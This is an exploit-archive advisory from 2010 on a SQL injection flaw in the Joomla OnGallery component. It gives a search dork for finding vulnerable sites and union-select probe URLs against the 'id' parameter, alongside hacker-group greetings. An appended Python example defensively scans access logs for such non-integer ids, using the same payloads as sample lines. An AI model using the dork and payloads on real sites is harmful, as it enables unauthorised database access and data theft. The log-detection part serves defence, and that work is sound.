# Title : Joomla Component OnGallery SQL Injection Vulnerability
# Published : 2010-08-16
# Author : al bayraqim
===================================================
Joomla Component (com_ongallery) SQL Injection Vulnerability
===================================================
Author : _aL_Bayraqim_
Homepage : http://www.1923turk.com
BORDO BERELİLER GRUP KOMUTANLIGI
..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...Mücahit...!
===================================================
[+]G00gle Dork :index.php?option=com_ongallery
[+] Vulnerable File :
http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL]
[+] ExploiT :
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
===================================================
The martyr came, a mortal lie; he left, his immortality real. You corpses that go on living, who will raise you from the dead?..
===================================================
Greetz : 1923Turk All Users
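===================================================
Added example (not part of the original advisory, and not code from the component): a log check for the `id` parameter named above, flagging com_ongallery requests whose `id` is not a plain integer. The log lines are constructed samples, and the function names and the assumption that legitimate ids are non-negative integers are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Aug/2010:10:00:01 +0000] '
    '"GET /index.php?option=com_ongallery&task=ft&id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [16/Aug/2010:10:00:07 +0000] '
    '"GET /index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- HTTP/1.1" 200 431',
    '192.0.2.44 - - [16/Aug/2010:10:00:09 +0000] '
    '"GET /index.php?option=com_ongallery&task=ft&id=-1%20union%20select%201-- HTTP/1.1" 500 0',
    '192.0.2.77 - - [16/Aug/2010:10:00:12 +0000] '
    '"GET /index.php?option=com_content&id=5 HTTP/1.1" 200 900',
]

def suspicious_ongallery_id(log_line):
    """Return the decoded id value when the line is a com_ongallery request
    whose id is not a plain non-negative integer; otherwise return None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    # parse_qs undoes '+' and %xx encoding, so both encodings compare equal.
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_ongallery" not in params.get("option", []):
        return None
    for value in params.get("id", []):
        # Assumption: a legitimate gallery id is digits only.
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_id) for every flagged line."""
    hits = []
    for line in lines:
        bad = suspicious_ongallery_id(line)
        if bad is not None:
            hits.append((line.split()[0], bad))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}: non-integer id in com_ongallery request: {value!r}")
```

The same digits-only rule is what the component should enforce on `id` before it reaches a query; the check above only surfaces requests that violate it.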